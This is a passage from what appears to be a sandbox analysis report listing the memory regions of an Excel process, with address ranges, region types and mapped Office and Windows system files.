	        filename = ""

Region:
	              id = 281
	        start_va = 0x20f97380000
	          end_va = 0x20f9738ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f97380000"
	        filename = ""

Region:
	              id = 282
	        start_va = 0x20f97390000
	          end_va = 0x20f9739ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f97390000"
	        filename = ""

Region:
	              id = 283
	        start_va = 0x20f973a0000
	          end_va = 0x20f973affff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f973a0000"
	        filename = ""

Region:
	              id = 284
	        start_va = 0x20f973b0000
	          end_va = 0x20f977b7fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f973b0000"
	        filename = ""

Region:
	              id = 285
	        start_va = 0x20f977c0000
	          end_va = 0x20f97bd0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f977c0000"
	        filename = ""

Region:
	              id = 286
	        start_va = 0x20f97be0000
	          end_va = 0x20f97fe2fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f97be0000"
	        filename = ""

Region:
	              id = 287
	        start_va = 0x20f97ff0000
	          end_va = 0x20f97ff0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f97ff0000"
	        filename = ""

Region:
	              id = 288
	        start_va = 0x20f98000000
	          end_va = 0x20f98000fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f98000000"
	        filename = ""

Region:
	              id = 289
	        start_va = 0x20f98010000
	          end_va = 0x20f9808ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f98010000"
	        filename = ""

Region:
	              id = 290
	        start_va = 0x20f98090000
	          end_va = 0x20f980a0fff
	     entry_point = 0x20f98090000
	     region_type = mapped_file
	            name = "c_1255.nls"
	        filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls")

Region:
	              id = 291
	        start_va = 0x20f980b0000
	          end_va = 0x20f990effff
	     entry_point = 0x20f980b0000
	     region_type = mapped_file
	            name = "staticcache.dat"
	        filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")

Region:
	              id = 292
	        start_va = 0x20f990f0000
	          end_va = 0x20f990f3fff
	     entry_point = 0x20f990f0000
	     region_type = mapped_file
	            name = "cversions.2.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")

Region:
	              id = 293
	        start_va = 0x20f99100000
	          end_va = 0x20f9911cfff
	     entry_point = 0x20f99100000
	     region_type = mapped_file
	            name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000023.db"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000023.db" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000023.db")

Region:
	              id = 294
	        start_va = 0x20f99120000
	          end_va = 0x20f99121fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f99120000"
	        filename = ""

Region:
	              id = 295
	        start_va = 0x20f99130000
	          end_va = 0x20f99130fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f99130000"
	        filename = ""

Region:
	              id = 296
	        start_va = 0x20f99140000
	          end_va = 0x20f99140fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f99140000"
	        filename = ""

Region:
	              id = 297
	        start_va = 0x20f99150000
	          end_va = 0x20f99153fff
	     entry_point = 0x20f99150000
	     region_type = mapped_file
	            name = "cversions.2.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")

Region:
	              id = 298
	        start_va = 0x20f99160000
	          end_va = 0x20f9935ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f99160000"
	        filename = ""

Region:
	              id = 299
	        start_va = 0x20f99360000
	          end_va = 0x20f9981cfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f99360000"
	        filename = ""

Region:
	              id = 300
	        start_va = 0x20f99820000
	          end_va = 0x20f99cdcfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f99820000"
	        filename = ""

Region:
	              id = 301
	        start_va = 0x20f99ce0000
	          end_va = 0x20f9a0dafff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f99ce0000"
	        filename = ""

Region:
	              id = 302
	        start_va = 0x20f9a0e0000
	          end_va = 0x20f9a124fff
	     entry_point = 0x20f9a0e0000
	     region_type = mapped_file
	            name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db")

Region:
	              id = 303
	        start_va = 0x20f9a130000
	          end_va = 0x20f9a1bdfff
	     entry_point = 0x20f9a130000
	     region_type = mapped_file
	            name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db")

Region:
	              id = 304
	        start_va = 0x20f9a1c0000
	          end_va = 0x20f9a1c1fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f9a1c0000"
	        filename = ""

Region:
	              id = 305
	        start_va = 0x20f9a1d0000
	          end_va = 0x20f9a1d0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9a1d0000"
	        filename = ""

Region:
	              id = 306
	        start_va = 0x20f9a1e0000
	          end_va = 0x20f9a1e3fff
	     entry_point = 0x20f9a1e0000
	     region_type = mapped_file
	            name = "iconcache_idx.db"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db")

Region:
	              id = 307
	        start_va = 0x20f9a1f0000
	          end_va = 0x20f9a1f1fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9a1f0000"
	        filename = ""

Region:
	              id = 308
	        start_va = 0x20f9a200000
	          end_va = 0x20f9a201fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f9a200000"
	        filename = ""

Region:
	              id = 309
	        start_va = 0x20f9a210000
	          end_va = 0x20f9a233fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9a210000"
	        filename = ""

Region:
	              id = 310
	        start_va = 0x20f9a240000
	          end_va = 0x20f9a240fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9a240000"
	        filename = ""

Region:
	              id = 311
	        start_va = 0x20f9a250000
	          end_va = 0x20f9a258fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9a250000"
	        filename = ""

Region:
	              id = 312
	        start_va = 0x20f9a260000
	          end_va = 0x20f9a267fff
	     entry_point = 0x20f9a260000
	     region_type = mapped_file
	            name = "windows.storage.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\windows.storage.dll.mui")

Region:
	              id = 313
	        start_va = 0x20f9a270000
	          end_va = 0x20f9a273fff
	     entry_point = 0x20f9a270000
	     region_type = mapped_file
	            name = "cversions.2.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")

Region:
	              id = 314
	        start_va = 0x20f9a280000
	          end_va = 0x20f9a280fff
	     entry_point = 0x20f9a280000
	     region_type = mapped_file
	            name = "{dc92199f-58e0-47b2-a19d-f989f346654c}.2.ver0x0000000000000001.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DC92199F-58E0-47B2-A19D-F989F346654C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{dc92199f-58e0-47b2-a19d-f989f346654c}.2.ver0x0000000000000001.db")

Region:
	              id = 315
	        start_va = 0x20f9a290000
	          end_va = 0x20f9a291fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f9a290000"
	        filename = ""

Region:
	              id = 316
	        start_va = 0x20f9a2a0000
	          end_va = 0x20f9a2a3fff
	     entry_point = 0x20f9a2a0000
	     region_type = mapped_file
	            name = "iconcache_idx.db"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db")

Region:
	              id = 317
	        start_va = 0x20f9a2b0000
	          end_va = 0x20f9a2b0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9a2b0000"
	        filename = ""

Region:
	              id = 318
	        start_va = 0x20f9a2c0000
	          end_va = 0x20f9a2c3fff
	     entry_point = 0x20f9a2c0000
	     region_type = mapped_file
	            name = "iconcache_idx.db"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db")

Region:
	              id = 319
	        start_va = 0x20f9a2d0000
	          end_va = 0x20f9a2e8fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9a2d0000"
	        filename = ""

Region:
	              id = 320
	        start_va = 0x20f9a2f0000
	          end_va = 0x20f9a2f7fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9a2f0000"
	        filename = ""

Region:
	              id = 321
	        start_va = 0x20f9a300000
	          end_va = 0x20f9a318fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9a300000"
	        filename = ""

Region:
	              id = 322
	        start_va = 0x20f9a320000
	          end_va = 0x20f9a338fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9a320000"
	        filename = ""

Region:
	              id = 323
	        start_va = 0x20f9a340000
	          end_va = 0x20f9a343fff
	     entry_point = 0x20f9a340000
	     region_type = mapped_file
	            name = "iconcache_idx.db"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db")

Region:
	              id = 324
	        start_va = 0x20f9a350000
	          end_va = 0x20f9a353fff
	     entry_point = 0x20f9a350000
	     region_type = mapped_file
	            name = "iconcache_idx.db"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db")

Region:
	              id = 325
	        start_va = 0x20f9a360000
	          end_va = 0x20f9a361fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f9a360000"
	        filename = ""

Region:
	              id = 326
	        start_va = 0x20f9a370000
	          end_va = 0x20f9a3b7fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9a370000"
	        filename = ""

Region:
	              id = 327
	        start_va = 0x20f9a3c0000
	          end_va = 0x20f9b38ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9a3c0000"
	        filename = ""

Region:
	              id = 328
	        start_va = 0x20f9b390000
	          end_va = 0x20f9b465fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f9b390000"
	        filename = ""

Region:
	              id = 329
	        start_va = 0x20f9b470000
	          end_va = 0x20f9b481fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9b470000"
	        filename = ""

Region:
	              id = 330
	        start_va = 0x20f9b490000
	          end_va = 0x20f9b490fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9b490000"
	        filename = ""

Region:
	              id = 331
	        start_va = 0x20f9b4a0000
	          end_va = 0x20f9b4a1fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9b4a0000"
	        filename = ""

Region:
	              id = 332
	        start_va = 0x20f9b4b0000
	          end_va = 0x20f9b4b0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f9b4b0000"
	        filename = ""

Region:
	              id = 333
	        start_va = 0x20f9b4c0000
	          end_va = 0x20f9b4f5fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f9b4c0000"
	        filename = ""

Region:
	              id = 334
	        start_va = 0x20f9b500000
	          end_va = 0x20f9b500fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9b500000"
	        filename = ""

Region:
	              id = 335
	        start_va = 0x20f9b510000
	          end_va = 0x20f9b51ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9b510000"
	        filename = ""

Region:
	              id = 336
	        start_va = 0x20f9b520000
	          end_va = 0x20f9b523fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9b520000"
	        filename = ""

Region:
	              id = 337
	        start_va = 0x20f9b530000
	          end_va = 0x20f9b530fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9b530000"
	        filename = ""

Region:
	              id = 338
	        start_va = 0x20f9b540000
	          end_va = 0x20f9b541fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f9b540000"
	        filename = ""

Region:
	              id = 339
	        start_va = 0x20f9b550000
	          end_va = 0x20f9b55ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9b550000"
	        filename = ""

Region:
	              id = 340
	        start_va = 0x20f9b560000
	          end_va = 0x20f9ba3dfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f9b560000"
	        filename = ""

Region:
	              id = 341
	        start_va = 0x20f9ba40000
	          end_va = 0x20f9bb1ffff
	     entry_point = 0x20f9ba40000
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")

Region:
	              id = 342
	        start_va = 0x20f9bb20000
	          end_va = 0x20f9bb20fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9bb20000"
	        filename = ""

Region:
	              id = 343
	        start_va = 0x20f9bb30000
	          end_va = 0x20f9bb3ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9bb30000"
	        filename = ""

Region:
	              id = 344
	        start_va = 0x20f9bb40000
	          end_va = 0x20f9bec6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f9bb40000"
	        filename = ""

Region:
	              id = 345
	        start_va = 0x20f9bed0000
	          end_va = 0x20f9c256fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f9bed0000"
	        filename = ""

Region:
	              id = 346
	        start_va = 0x20f9c260000
	          end_va = 0x20f9c35ffff
	     entry_point = 0x20f9c260000
	     region_type = mapped_file
	            name = "iconcache_16.db"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_16.db" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_16.db")

Region:
	              id = 347
	        start_va = 0x20f9c440000
	          end_va = 0x20f9c44ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9c440000"
	        filename = ""

Region:
	              id = 348
	        start_va = 0x20f9c450000
	          end_va = 0x20f9c54ffff
	     entry_point = 0x20f9c450000
	     region_type = mapped_file
	            name = "iconcache_16.db"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_16.db" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_16.db")

Region:
	              id = 349
	        start_va = 0x20f9c550000
	          end_va = 0x20f9c64ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9c550000"
	        filename = ""

Region:
	              id = 350
	        start_va = 0x20f9c650000
	          end_va = 0x20f9c84ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9c650000"
	        filename = ""

Region:
	              id = 351
	        start_va = 0x20f9c850000
	          end_va = 0x20f9ca4ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9c850000"
	        filename = ""

Region:
	              id = 352
	        start_va = 0x20f9ca50000
	          end_va = 0x20f9cba1fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f9ca50000"
	        filename = ""

Region:
	              id = 353
	        start_va = 0x20f9cbb0000
	          end_va = 0x20f9ccaffff
	     entry_point = 0x20f9cbb0000
	     region_type = mapped_file
	            name = "iconcache_16.db"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_16.db" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_16.db")

Region:
	              id = 354
	        start_va = 0x20f9ccb0000
	          end_va = 0x20f9cdaffff
	     entry_point = 0x20f9ccb0000
	     region_type = mapped_file
	            name = "iconcache_16.db"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_16.db" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_16.db")

Region:
	              id = 355
	        start_va = 0x20f9cdb0000
	          end_va = 0x20f9cf68fff
	     entry_point = 0x20f9cdb0000
	     region_type = mapped_file
	            name = "office.odf"
	        filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\cultures\\office.odf")

Region:
	              id = 356
	        start_va = 0x20f9cf70000
	          end_va = 0x20f9d7edfff
	     entry_point = 0x20f9cf70000
	     region_type = mapped_file
	            name = "grooveintlresource.dll"
	        filename = "\\PROGRA~1\\MICROS~2\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\progra~1\\micros~2\\office16\\1033\\grooveintlresource.dll")

Region:
	              id = 357
	        start_va = 0x20f9f8d0000
	          end_va = 0x20f9f9cffff
	     entry_point = 0x20f9f8d0000
	     region_type = mapped_file
	            name = "iconcache_16.db"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_16.db" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_16.db")

Region:
	              id = 358
	        start_va = 0x7ff6c4dd0000
	          end_va = 0x7ff6c4ddffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff6c4dd0000"
	        filename = ""

Region:
	              id = 359
	        start_va = 0x7ff6c4de0000
	          end_va = 0x7ff6c4deffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff6c4de0000"
	        filename = ""

Region:
	              id = 360
	        start_va = 0x7ff6c4df0000
	          end_va = 0x7ff6c4eeffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff6c4df0000"
	        filename = ""

Region:
	              id = 361
	        start_va = 0x7ff6c4ef0000
	          end_va = 0x7ff6c4f12fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff6c4ef0000"
	        filename = ""

Region:
	              id = 362
	        start_va = 0x7ff6c5f00000
	          end_va = 0x7ff6c7fe0fff
	     entry_point = 0x7ff6c5f00000
	     region_type = mapped_file
	            name = "excel.exe"
	        filename = "\\Program Files\\Microsoft Office\\Office16\\EXCEL.EXE" (normalized: "c:\\program files\\microsoft office\\office16\\excel.exe")

Region:
	              id = 363
	        start_va = 0x7ffbd7200000
	          end_va = 0x7ffbd720ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffbd7200000"
	        filename = ""

Region:
	              id = 364
	        start_va = 0x7ffbf6ba0000
	          end_va = 0x7ffbf6cc6fff
	     entry_point = 0x7ffbf6ba0000
	     region_type = mapped_file
	            name = "networkexplorer.dll"
	        filename = "\\Windows\\System32\\networkexplorer.dll" (normalized: "c:\\windows\\system32\\networkexplorer.dll")

Region:
	              id = 365
	        start_va = 0x7ffbf6cd0000
	          end_va = 0x7ffbf6cf5fff
	     entry_point = 0x7ffbf6cd0000
	     region_type = mapped_file
	            name = "ehstorapi.dll"
	        filename = "\\Windows\\System32\\EhStorAPI.dll" (normalized: "c:\\windows\\system32\\ehstorapi.dll")

Region:
	              id = 366
	        start_va = 0x7ffbf6e10000
	          end_va = 0x7ffbf7012fff
	     entry_point = 0x7ffbf6e10000
	     region_type = mapped_file
	            name = "wpdshext.dll"
	        filename = "\\Windows\\System32\\wpdshext.dll" (normalized: "c:\\windows\\system32\\wpdshext.dll")

Region:
	              id = 367
	        start_va = 0x7ffbf7020000
	          end_va = 0x7ffbf7093fff
	     entry_point = 0x7ffbf7020000
	     region_type = mapped_file
	            name = "playtodevice.dll"
	        filename = "\\Windows\\System32\\PlayToDevice.dll" (normalized: "c:\\windows\\system32\\playtodevice.dll")

Region:
	              id = 368
	        start_va = 0x7ffbf70a0000
	          end_va = 0x7ffbf711efff
	     entry_point = 0x7ffbf70a0000
	     region_type = mapped_file
	            name = "dlnashext.dll"
	        filename = "\\Windows\\System32\\dlnashext.dll" (normalized: "c:\\windows\\system32\\dlnashext.dll")

Region:
	              id = 369
	        start_va = 0x7ffbf7120000
	          end_va = 0x7ffbf71ebfff
	     entry_point = 0x7ffbf7120000
	     region_type = mapped_file
	            name = "windows.storage.search.dll"
	        filename = "\\Windows\\System32\\Windows.Storage.Search.dll" (normalized: "c:\\windows\\system32\\windows.storage.search.dll")

Region:
	              id = 370
	        start_va = 0x7ffbf71f0000
	          end_va = 0x7ffbf73a2fff
	     entry_point = 0x7ffbf71f0000
	     region_type = mapped_file
	            name = "dui70.dll"
	        filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll")

Region:
	              id = 371
	        start_va = 0x7ffbf73b0000
	          end_va = 0x7ffbf7452fff
	     entry_point = 0x7ffbf73b0000
	     region_type = mapped_file
	            name = "tiptsf.dll"
	        filename = "\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll")

Region:
	              id = 372
	        start_va = 0x7ffbf7460000
	          end_va = 0x7ffbf76b1fff
	     entry_point = 0x7ffbf7460000
	     region_type = mapped_file
	            name = "wxpnse.dll"
	        filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\WXPNSE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\wxpnse.dll")

Region:
	              id = 373
	        start_va = 0x7ffbf76c0000
	          end_va = 0x7ffbf7769fff
	     entry_point = 0x7ffbf76c0000
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_396e892957c7fb25\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_396e892957c7fb25\\comctl32.dll")

Region:
	              id = 374
	        start_va = 0x7ffbf7870000
	          end_va = 0x7ffbf7887fff
	     entry_point = 0x7ffbf7870000
	     region_type = mapped_file
	            name = "usp10.dll"
	        filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")

Region:
	              id = 375
	        start_va = 0x7ffbf7d10000
	          end_va = 0x7ffbf8808fff
	     entry_point = 0x7ffbf7d10000
	     region_type = mapped_file
	            name = "chart.dll"
	        filename = "\\Program Files\\Microsoft Office\\Office16\\CHART.DLL" (normalized: "c:\\program files\\microsoft office\\office16\\chart.dll")

Region:
	              id = 376
	        start_va = 0x7ffbf8810000
	          end_va = 0x7ffbf8a32fff
	     entry_point = 0x7ffbf8810000
	     region_type = mapped_file
	            name = "riched20.dll"
	        filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\riched20.dll")

Region:
	              id = 377
	        start_va = 0x7ffbf8a40000
	          end_va = 0x7ffbf8ad7fff
	     entry_point = 0x7ffbf8a40000
	     region_type = mapped_file
	            name = "mscoreei.dll"
	        filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll")

Region:
	              id = 378
	        start_va = 0x7ffbf8ae0000
	          end_va = 0x7ffbf8b47fff
	     entry_point = 0x7ffbf8ae0000
	     region_type = mapped_file
	            name = "mscoree.dll"
	        filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll")

Region:
	              id = 379
	        start_va = 0x7ffbf8b50000
	          end_va = 0x7ffbf8bb1fff
	     entry_point = 0x7ffbf8b50000
	     region_type = mapped_file
	            name = "d3d10_1core.dll"
	        filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll")

Region:
	              id = 380
	        start_va = 0x7ffbf8bc0000
	          end_va = 0x7ffbf9e9bfff
	     entry_point = 0x7ffbf8bc0000
	     region_type = mapped_file
	            name = "mso.dll"
	        filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso.dll")

Region:
	              id = 381
	        start_va = 0x7ffbf9ea0000
	          end_va = 0x7ffbfa66bfff
	     entry_point = 0x7ffbf9ea0000
	     region_type = mapped_file
	            name = "mso99lwin32client.dll"
	        filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Mso99Lwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso99lwin32client.dll")

Region:
	              id = 382
	        start_va = 0x7ffbfa670000
	          end_va = 0x7ffbfaf5afff
	     entry_point = 0x7ffbfa670000
	     region_type = mapped_file
	            name = "mso40uiwin32client.dll"
	        filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso40uiwin32client.dll")

Region:
	              id = 383
	        start_va = 0x7ffbfaf60000
	          end_va = 0x7ffbfb3d7fff
	     entry_point = 0x7ffbfaf60000
	     region_type = mapped_file
	            name = "mso30win32client.dll"
	        filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso30win32client.dll")

Region:
	              id = 384
	        start_va = 0x7ffbfb3e0000
	          end_va = 0x7ffbfb6e3fff
	     entry_point = 0x7ffbfb3e0000
	     region_type = mapped_file
	            name = "mso20win32client.dll"
	        filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso20win32client.dll")

Region:
	              id = 385
	        start_va = 0x7ffbfb6f0000
	          end_va = 0x7ffbfc85bfff
	     entry_point = 0x7ffbfb6f0000
	     region_type = mapped_file
	            name = "oart.dll"
	        filename = "\\Program Files\\Microsoft Office\\Office16\\OART.DLL" (normalized: "c:\\program files\\microsoft office\\office16\\oart.dll")

Region:
	              id = 386
	        start_va = 0x7ffbfe4b0000
	          end_va = 0x7ffbfe4e1fff
	     entry_point = 0x7ffbfe4b0000
	     region_type = mapped_file
	            name = "d3d10_1.dll"
	        filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll")

Region:
	              id = 387
	        start_va = 0x7ffc01c60000
	          end_va = 0x7ffc01f98fff
	     entry_point = 0x7ffc01c60000
	     region_type = mapped_file
	            name = "msftedit.dll"
	        filename = "\\Windows\\System32\\msftedit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll")

Region:
	              id = 388
	        start_va = 0x7ffc02330000
	          end_va = 0x7ffc0233ffff
	     entry_point = 0x7ffc02330000
	     region_type = mapped_file
	            name = "atlthunk.dll"
	        filename = "\\Windows\\System32\\atlthunk.dll" (normalized: "c:\\windows\\system32\\atlthunk.dll")

Region:
	              id = 389
	        start_va = 0x7ffc04230000
	          end_va = 0x7ffc04266fff
	     entry_point = 0x7ffc04230000
	     region_type = mapped_file
	            name = "ehstorshell.dll"
	        filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll")

Region:
	              id = 390
	        start_va = 0x7ffc04270000
	          end_va = 0x7ffc04483fff
	     entry_point = 0x7ffc04270000
	     region_type = mapped_file
	            name = "grooveex.dll"
